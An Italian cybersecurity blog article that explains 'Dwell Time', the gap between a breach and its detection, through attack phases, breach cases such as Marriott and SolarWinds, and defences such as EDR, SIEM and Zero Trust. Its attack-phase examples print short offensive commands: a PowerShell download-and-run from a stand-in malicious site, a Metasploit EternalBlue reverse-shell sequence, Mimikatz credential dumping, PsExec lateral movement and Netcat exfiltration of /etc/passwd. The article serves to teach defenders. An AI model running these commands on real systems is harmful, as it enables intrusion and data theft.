Diamo valore alla tua privacy

Utilizziamo i cookie per migliorare la tua esperienza di navigazione e analizzare il traffico in modo anonimo per scopi statistici interni. Cliccando “Accetta tutti”, acconsenti all'uso dei cookie.

Personalizza le preferenze di consenso

Utilizziamo i cookie per aiutarti a navigare in maniera efficiente e a svolgere determinate funzioni. Troverai informazioni dettagliate su tutti i cookie sotto ogni categoria di consensi sottostanti. I cookie categorizzatati come “Necessari” vengono memorizzati sul tuo browser in quanto essenziali per consentire le funzionalità di base del sito.... 

Sempre attivi

I cookie necessari sono fondamentali per le funzioni di base del sito Web e il sito Web non funzionerà nel modo previsto senza di essi. Questi cookie non memorizzano dati identificativi personali.

  • Cookie
    cookieyes-consent
  • Durata
    1 anno
  • descrizione

    CookieYes imposta questo cookie per ricordare le preferenze di consenso degli utenti in modo che le loro preferenze siano rispettate nelle visite successive a questo sito. Non raccoglie o memorizza alcuna informazione personale sui visitatori del sito.

  • Cookie
    _GRECAPTCHA
  • Durata
    180 giorni
  • descrizione
    Questo cookie è utilizzato dal servizio Google reCAPTCHA per proteggere il sito da spam e abusi, distinguendo tra utenti reali e bot. Esegue un'analisi del rischio raccogliendo informazioni sul comportamento di navigazione e sul dispositivo, come movimenti del mouse, sequenze di tasti e dettagli tecnici.

I cookie funzionali aiutano a svolgere determinate funzionalità come la condivisione del contenuto del sito Web su piattaforme di social media, la raccolta di feedback e altre funzionalità di terze parti.

  • Cookie
    language
  • Durata
    1 anno
  • descrizione
    Questo cookie viene utilizzato per memorizzare la preferenza linguistica dell'utente.
  • Cookie
    post_viewed_
  • Durata
    1 ora
  • descrizione

    Questo cookie impedisce che una singola visita ad un articolo venga conteggiata più volte all'aggiornamento della pagina.

I cookie analitici vengono utilizzati per comprendere come i visitatori interagiscono con il sito Web. Questi cookie aiutano a fornire informazioni sulle metriche di numero di visitatori, frequenza di rimbalzo, fonte di traffico, ecc.

  • Cookie
    _ga_*
  • Durata
    1 anno 1 mese 4 giorni
  • descrizione

    Google Analytics imposta questo cookies per contare i visitatori della pagina

  • Cookie
    _ga
  • Durata
    1 anno 1 mese 4 giorni
  • descrizione

    Google Analytics imposta questo cookie per calcolare i dati di visitatori, sessioni e campagne e tracciare l'utilizzo del sito per il report analitico del sito. Il cookie memorizza le informazioni in modo anonimo e assegna un numero generato casualmente per riconoscere i visitatori unici.

I cookie per le prestazioni vengono utilizzati per comprendere e analizzare gli indici di prestazione chiave del sito Web che aiutano a fornire ai visitatori un'esperienza utente migliore.

Nessun cookie da visualizzare.

I cookie pubblicitari vengono utilizzati per fornire ai visitatori annunci pubblicitari personalizzati in base alle pagine visitate in precedenza e per analizzare l'efficacia della campagna pubblicitaria.

Nessun cookie da visualizzare.

Minacce

Dwell Time: il tempo che favorisce gli attacchi 

Il Dwell Time in cyber security è il tempo tra la violazione e il rilevamento. Scopri cos'è, le sue fasi, i rischi e come ridurlo al minimo.

Prolungato Dwell Time

23 Aprile 2025

Indice dei contenuti

  • Cos’è il Dwell Time in cyber security 
  • Le fasi del Dwell Time 
  • Conseguenze di un Dwell Time elevato 
  • Come ridurre il Dwell Time

Cos’è il Dwell Time in cyber security 

Il Dwell Time è uno dei principali indicatori di rischio nella sicurezza informatica. Si tratta del tempo che intercorre tra il momento in cui un attaccante ottiene l’accesso non autorizzato a un sistema e quello in cui la minaccia viene rilevata ed eliminata.

Più lungo è questo intervallo, maggiori sono le possibilità per l’attaccante di spostarsi lateralmente nella rete, esfiltrare dati sensibili e compromettere sistemi critici. 

Uno dei dati più allarmanti è che il Dwell Time medio si misura in giorni o addirittura mesi. Secondo il report M-Trends di Mandiant, nel 2023 il tempo medio di permanenza di un attacco non rilevato era di 16 giorni, ma in alcuni casi può superare i 100 giorni

Il Dwell Time è un problema cruciale per aziende e organizzazioni, perché il tempo di permanenza degli attaccanti incide direttamente sull’entità del danno subito. Capire le sue fasi, le conseguenze e le strategie per ridurlo è essenziale per migliorare la postura di cyber security

Le fasi del Dwell Time 

Il Dwell Time rappresenta il periodo in cui un attaccante rimane inosservato all’interno di un sistema compromesso. Durante questo tempo, l’attaccante esegue diverse operazioni, dalla prima intrusione alla persistenza, fino all’esfiltrazione dei dati o al sabotaggio del sistema. 

Vediamo ora le fasi principali di questo processo, con esempi reali e tecniche di attacco utilizzate. 

Intrusione iniziale 

L’attaccante ottiene il primo accesso a un sistema sfruttando vulnerabilità o credenziali rubate. Questo può avvenire in diversi modi: 

  • Phishing
    Invio di email fraudolente con allegati malevoli o link a siti compromessi. 
  • Exploit zero-day
    Utilizzo di vulnerabilità non ancora patchate nei software. 
  • Brute force e credential stuffing
    Tentativi automatizzati per violare credenziali deboli. 
  • Infezione tramite malware
    Uso di trojan, keylogger o rootkit per ottenere un accesso remoto. 

Esempio: attacco di phishing con payload PowerShell 

Un attaccante potrebbe inviare un’email con un allegato Excel contenente una macro malevola. Quando la vittima abilita le macro, viene eseguito uno script PowerShell che scarica ed esegue un payload. 

Codice PowerShell di un attacco di phishing: 

powershell 

$wc = New-Object System.Net.WebClient 

$url = "http://malicious-site.com/payload.exe" 

$file = "$env:APPDATA\payload.exe" 

$wc.DownloadFile($url, $file) 

Start-Process $file

Questo codice scarica ed esegue un file malevolo che può fornire all’attaccante accesso remoto al sistema. 

Esempio: Exploit SMB su una vulnerabilità nota 

Un attaccante potrebbe sfruttare una vulnerabilità nei servizi di condivisione file SMB (come EternalBlue, exploit usato da WannaCry). 

Esempio di comando Metasploit per sfruttare EternalBlue su Windows: 

bash 

use exploit/windows/smb/ms17_010_eternalblue 

set RHOSTS 192.168.1.100 

set PAYLOAD windows/meterpreter/reverse_tcp 

set LHOST 192.168.1.200 

exploit

Se l’attacco ha successo, l’attaccante ottiene accesso remoto alla macchina target. 

Persistenza e movimento laterale 

Una volta ottenuto l’accesso iniziale, l’attaccante cerca di mantenere il controllo del sistema e di espandersi nella rete. Le tecniche più comuni includono: 

  • Creazione di backdoor
    Per accedere in futuro anche se la vulnerabilità iniziale viene corretta. 
  • Escalation dei privilegi
    Passando da un account utente normale ad amministratore. 
  • Uso di credenziali rubate
    Con strumenti come Mimikatz per accedere ad altri sistemi. 
  • Movimento laterale
    Sfruttando connessioni di rete per comprometterne altre. 

Esempio: dumping delle credenziali con Mimikatz 

Un attaccante con accesso limitato può usare Mimikatz per estrarre credenziali in chiaro dalla memoria di un sistema Windows. 

powershell 

privilege::debug 

sekurlsa::logonpasswords

Se eseguito con privilegi amministrativi, questo comando restituisce credenziali di utenti attivi, consentendo all’attaccante di effettuare pass-the-hash o pass-the-ticket per muoversi lateralmente. 

Esempio: Movimento laterale con PsExec 

Se un attaccante ottiene credenziali amministrative, può usare PsExec per eseguire comandi su altri sistemi della rete: 

bash 

psexec \\192.168.1.101 -u Administrator -p password cmd.exe

Questo comando consente di aprire una shell remota su un altro computer con le credenziali rubate. 

Esfiltrazione e impatto 

A questo punto, l’attaccante ha il pieno controllo della rete e può esfiltrare dati, installare ransomware o sabotare i sistemi. Alcune delle tecniche usate includono: 

  • Esfiltrazione dati
    Invio di file sensibili a server controllati dall’attaccante. 
  • Cifratura ransomware
    Blocco dei file con richiesta di riscatto. 
  • Sabotaggio e distruzione
    Eliminazione di backup e cancellazione di dati per rendere il recupero impossibile. 

Esempio: esfiltrazione di dati con Netcat 

Un attaccante può usare Netcat per trasferire dati rubati a un server remoto: 

bash 

nc -w 3 192.168.1.200 4444 < /etc/passwd

Dall’altro lato, il server dell’attaccante ascolta e salva i dati ricevuti: 

bash 

nc -lvp 4444 > stolen_data.txt

Esempio: cifratura ransomware con Python 

Un attaccante potrebbe eseguire uno script che cifra i file della vittima con AES

python 

from cryptography.fernet import Fernet 

# Genera una chiave di cifratura 

key = Fernet.generate_key() 

cipher = Fernet(key) 

# Cifra un file 

with open("document.txt", "rb") as file: 

    encrypted_data = cipher.encrypt(file.read()) 

with open("document.txt.enc", "wb") as file: 

    file.write(encrypted_data) 

print("File cifrato. Chiave:", key.decode())

Un ransomware reale eliminerebbe la chiave locale e chiederebbe un riscatto per decriptare i file. 

Rilevamento e risposta 

La fase finale è il momento in cui la violazione viene scoperta e l’organizzazione tenta di mitigare i danni. 

  • Analisi dei log
    Gli analisti esaminano i log SIEM per tracciare l’attaccante. 
  • Threat Hunting
    Gli esperti di sicurezza cercano indicatori di compromissione (IOC). 
  • Isolamento della minaccia
    Vengono chiusi account compromessi e bloccate connessioni malevole. 
  • Ripristino
    Si riportano in sicurezza i sistemi compromessi e si aggiornano le difese. 

Esempio: rilevamento di attività sospette nei log 

Un amministratore può usare PowerShell per cercare attività anomale nei log di Windows: 

powershell 

Get-WinEvent -LogName Security | Where-Object { $_.Id -eq 4625 }

Questo comando identifica tentativi di accesso non riusciti, che possono indicare brute force o tentativi di login con credenziali rubate. 

Esempio: blocco di un IP malevolo con firewall IPTables 

Se viene rilevata attività sospetta da un determinato IP, è possibile bloccarlo immediatamente: 

bash 

iptables -A INPUT -s 203.0.113.45 -j DROP

Questo impedisce ulteriori connessioni dall’indirizzo IP dell’attaccante. 

Furto di dati ed esposizione delle informazioni

Conseguenze di un Dwell Time elevato 

Un Dwell Time prolungato rappresenta un rischio critico per qualsiasi organizzazione, poiché più tempo un attaccante resta inosservato all’interno della rete, maggiore sarà il danno subito.

Vediamo in dettaglio le principali conseguenze, con esempi concreti e riferimenti a casi reali

Furto di dati sensibili 

Un attaccante con accesso prolungato a un sistema può esfiltrare dati sensibili, inclusi: 

  • dati personali dei clienti (nome, indirizzo, numeri di carta di credito, credenziali di accesso;
  • Informazioni riservate dell’azienda, come proprietà intellettuale e documenti strategici;
  • Dati finanziari e bancari, utilizzabili per frodi o vendibili nel dark web. 

Esempio: il caso Marriott (2014-2018) 

L’attacco informatico subito dal gruppo Marriott International è uno degli esempi più eclatanti di Dwell Time prolungato. L’attaccante ha avuto accesso ai sistemi della catena alberghiera per 4 anni, rubando dati di circa 500 milioni di clienti

Dati compromessi: 

  • nomi, numeri di passaporto, dettagli di carte di credito, informazioni di contatto;
  • storico delle prenotazioni e soggiorni degli ospiti. 

Impatto: 

  • fiducia dei clienti distrutta, con migliaia di utenti preoccupati per il furto di dati;
  • sanzione di 23,8 milioni di sterline imposta dal regolatore britannico per violazione del GDPR. 

Maggiore impatto economico 

Più lungo è il Dwell Time, più alto sarà il costo totale della violazione. Secondo il Cost of a Data Breach Report 2023di IBM, le violazioni che rimangono nascoste per più di 200 giorni costano in media 4,45 milioni di dollari, rispetto a 3,5 milioni per quelle rilevate in meno di 100 giorni

Esempio: l’attacco a Equifax (2017) 

Equifax, una delle più grandi agenzie di credito al mondo, è stata violata nel marzo 2017, ma l’attacco è stato scoperto solo a luglio 2017, con un Dwell Time di oltre 4 mesi

Danni economici: 

  • 700 milioni di dollari di multe e risarcimenti;
  • perdita di valore azionario del 35% in poche settimane;
  • costi legali e di ripristino enormi per aggiornare la sicurezza IT. 

Dati rubati: 

  • Informazioni personali di 147 milioni di americani
  • Numeri di Social Security, date di nascita, patenti di guida. 

Danni reputazionali 

La reputazione aziendale può subire un colpo irreparabile dopo una violazione con Dwell Time elevato. Se i clienti scoprono che un’azienda non ha saputo proteggere i propri dati per mesi (o anni), la perdita di fiducia può essere devastante

Esempio: Yahoo! e la perdita di fiducia degli utenti 

Tra il 2013 e il 2016, Yahoo! ha subito due attacchi informatici con un Dwell Time superiore ai 2 anni, che hanno portato alla compromissione di 3 miliardi di account

Effetti sulla reputazione: 

  • gli utenti hanno smesso di fidarsi della piattaforma, passando a concorrenti come Google e Microsoft;
  • il valore di acquisizione di Yahoo! da parte di Verizon è stato ridotto di 350 milioni di dollari dopo la scoperta delle violazioni. 

Rischio operativo 

Se un attaccante resta nel sistema per settimane o mesi, può sabotare infrastrutture critiche e causare gravi interruzioni operative. Questo è particolarmente pericoloso nei settori: 

  • energetico (centrali elettriche, impianti industriali);
  • sanitario (ospedali, sistemi di emergenza);
  • finanziario (banche, borse valori). 

Esempio: l’attacco a Colonial Pipeline (2021) 

Un ransomware colpì il sistema di Colonial Pipeline, un’infrastruttura critica per la distribuzione di carburante negli Stati Uniti. L’attaccante rimase nel sistema per settimane, fino a quando il malware venne attivato, bloccando le operazioni. 

Conseguenze: 

  • interruzione totale del trasporto di carburante per la costa est degli USA
  • pagamento di un riscatto di 4,4 milioni di dollari agli hacker (DarkSide);
  • corsa alla benzina e panico tra i consumatori, con impatto economico e sociale. 

Diffusione dell’attacco 

Se un attaccante rimane troppo a lungo in un sistema, può esplorare la rete, compromettere nuovi dispositivi e creare backdoor per futuri attacchi

Esempio: l’attacco di SolarWinds (2019-2020) 

L’attacco a SolarWinds è un caso da manuale di diffusione lenta e metodica. Gli hacker hanno compromesso il software Orion, usato per la gestione IT, introducendo un codice malevolo che è rimasto invisibile per mesi

Diffusione dell’attacco: 

  • il malware è stato distribuito attraverso aggiornamenti software legittimi;
  • ha infettato 18.000 aziende e diverse agenzie governative (Pentagono, Microsoft, FireEye);
  • gli hacker hanno avuto accesso a email aziendali, dati sensibili e documenti segreti

Danni: 

  • furto di dati governativi e industriali su larga scala;
  • perdita di fiducia nelle supply chain IT, con molte aziende che hanno sospeso l’uso di SolarWinds;
  • costi di ripristino multimilionari per aziende e governi. 

Come ridurre il Dwell Time

Ridurre il Dwell Time è una delle sfide più importanti nella cyber security moderna. Gli attaccanti che riescono a infiltrarsi in una rete aziendale spesso rimangono nascosti per giorni, settimane o persino mesi, aumentando il rischio di furto di dati, sabotaggio o attacchi ransomware. 

Per mitigare questo rischio, le aziende devono migliorare le proprie difese in tre aree chiave: prevenzione, rilevamento e risposta. Vediamo nel dettaglio le strategie più efficaci, con esempi pratici e tecnologie utilizzate. 

Monitoraggio continuo con strumenti avanzati 

Uno dei modi più efficaci per ridurre il Dwell Time è adottare strumenti avanzati di rilevamento delle minacce in tempo reale

EDR (Endpoint Detection and Response) e XDR (Extended Detection and Response) permettono di: 

  • identificare comportamenti sospetti sui dispositivi degli utenti;
  • analizzare i pattern di attacco con intelligenza artificiale;
  • correlare eventi tra endpoint, server e cloud. 

Esempio: intercettare un ransomware con EDR 
Immaginiamo un’azienda che utilizza Microsoft Defender for Endpoint. Se un malware tenta di crittografare file, l’EDR può rilevare l’attività anomala e bloccare l’esecuzione del processo dannoso

Comando di PowerShell monitorato da EDR: 

powershell 

Get-ChildItem -Path C:\Users -Recurse | ForEach-Object { Encrypt-File $_.FullName }

Un sistema EDR rileverebbe questa attività e genererebbe un alert immediato, bloccando l’azione prima che i file vengano cifrati. 

Threat hunting attivo 

Affidarsi solo agli alert automatici non è sufficiente: gli attacchi più sofisticati possono mimetizzarsi nel traffico di rete. Per questo, molte aziende implementano il Threat Hunting, un’attività proattiva di ricerca delle minacce latenti all’interno dell’infrastruttura IT. 

Tecniche di threat hunting

  • analisi dei log di accesso per identificare attività anomale;
  • ricerca di connessioni sospette con strumenti come Zeek (ex Bro) o Wireshark;
  • controllo dei processi in esecuzione su endpoint alla ricerca di malware fileless

Esempio: identificare movimenti laterali con threat hunting 
Un analista SOC potrebbe utilizzare PowerShell per trovare connessioni remote sospette: 

powershell 

Get-WinEvent -LogName Security | Where-Object { $_.Id -eq 4624 -and $_.Properties[5].Value -eq "Network" }

Se un amministratore non riconosce l’IP da cui proviene l’accesso, potrebbe trattarsi di un attaccante che si muove lateralmente nella rete

Migliorare la visibilità della rete con SIEM e NDR 

  • SIEM (Security Information and Event Management)
    Raccoglie e analizza log di sistema, accessi, eventi di sicurezza e attività sospette. 
  • NDR (Network Detection and Response)
    Monitora il traffico di rete in tempo reale, identificando anomalie nei protocolli di comunicazione. 

Esempio: rilevare movimenti laterali con SIEM 
Un SOC che utilizza Splunk può creare una query per cercare accessi RDP sospetti tra server interni: 

spl 

index=security_logs source="wineventlog:security" EventCode=4624  

| stats count by Account_Name, IpAddress

Se l’IP di origine è insolito o proviene da un paese non associato all’azienda, potrebbe trattarsi di un attaccante che ha rubato credenziali e sta accedendo lateralmente

Autenticazione forte e Zero Trust 

  • Autenticazione Multi-Fattore (MFA)
    Anche se un attaccante ruba una password, senza il secondo fattore di autenticazione non potrà accedere. 

Zero Trust security model

  • non si fidano automaticamente nemmeno gli utenti interni;
  • ogni richiesta di accesso viene autenticata e autorizzata in base al principio del least privilege

Esempio: bloccare un attacco con Zero Trust 
Se un utente normale non ha mai effettuato login su un server amministrativo, un sistema Zero Trust come Okta potrebbe bloccare automaticamente il tentativo e chiedere una verifica MFA. 

Patch management e riduzione della superficie d’attacco 

Gli attaccanti spesso sfruttano vulnerabilità note per entrare in un sistema. Mantenere software, sistemi operativi e firmware aggiornati riduce enormemente il rischio. 

Esempio: exploit EternalBlue e WannaCry 
L’attacco WannaCry (2017) ha sfruttato una vulnerabilità di Windows SMBv1 (EternalBlue). Microsoft aveva già rilasciato una patch mesi prima, ma molte aziende non avevano aggiornato i propri sistemi. 

Se le aziende avessero implementato una strategia di patch management, avrebbero evitato milioni di dollari di danni

Automatizzare gli aggiornamenti con strumenti come WSUS, SCCM o Ansible è una delle strategie più efficaci per prevenire intrusioni. 

Formazione e consapevolezza dei dipendenti 

Molti attacchi iniziano con errori umani, come il phishing. Se un dipendente clicca su un’email fraudolenta, un attaccante può ottenere accesso a credenziali o installare malware nella rete. 

Strategie di cyber security awareness

  • simulazioni di attacchi di phishing per insegnare ai dipendenti a riconoscerli;
  • training sui rischi legati alle password e sull’importanza dell’MFA,
  • test periodici sulle procedure di sicurezza IT

Esempio
Blocco di phishing con DMARC, DKIM e SPF. Un’azienda può implementare record SPF, DKIM e DMARC per ridurre il rischio di email di phishing inviate a suo nome. 

Configurazione di un record DMARC nel DNS: 

perl 

_dmarc.example.com TXT "v=DMARC1; p=reject; rua=mailto:security@example.com"

Con questa configurazione, le email non autorizzate vengono rifiutate automaticamente dai server di posta. 

Conclusione 

Il Dwell Time è un parametro critico nella cyber security: più tempo un attaccante resta inosservato in un sistema, maggiori sono i danni che può causare.

Le aziende devono adottare strategie proattive per ridurlo, combinando tecnologie avanzate, monitoraggio continuo e formazione del personale. Investire nella riduzione del Dwell Time non solo migliora la sicurezza, ma riduce il rischio di violazioni devastanti e i relativi costi.

Domande e risposte 

  1. Cos’è il Dwell Time in cyber security? 
    Il Dwell Time è il tempo tra l’intrusione di un attaccante e la sua rilevazione da parte della vittima. 
  1. Perché un Dwell Time elevato è pericoloso? 
    Più a lungo un attaccante resta nel sistema, più dati può rubare e più danni può causare. 
  1. Qual è il Dwell Time medio di un attacco? 
    Secondo Mandiant, nel 2023 il Dwell Time medio era di 16 giorni, ma può arrivare a oltre 100 giorni. 
  1. Come si rileva un attacco con un Dwell Timee lungo? 
    Strumenti di EDR, XDR e SIEM aiutano a individuare movimenti sospetti e attività anomale. 
  1. Quali attacchi hanno un Dwell Time più lungo? 
    Minacce avanzate come APT (Advanced Persistent Threats) e attacchi basati su backdoor possono durare mesi. 
  1. Come ridurre il Dwell Time? 
    Implementando monitoraggio continuo, threat hunting, MFA e Zero Trust. 
  1. Il Dwell Time influisce sul costo di una violazione? 
    Sì, secondo IBM, attacchi rilevati in meno di 200 giorni costano milioni in meno rispetto a quelli con un Dwell Time superiore. 
  1. Quali aziende sono più a rischio di Dwell Time prolungato? 
    Organizzazioni con scarsa visibilità di rete, sistemi non aggiornati e difese deboli. 
  1. I ransomware hanno un Dwell Time elevato? 
    Dipende: alcuni agiscono rapidamente, mentre altri si diffondono nella rete prima di attivarsi. 
  1. Cosa succede dopo che un attacco con Dwell Time lungo viene rilevato? 
    È necessaria un’indagine forense, la rimozione della minaccia e il rafforzamento della sicurezza per prevenire future intrusioni. 
3
To top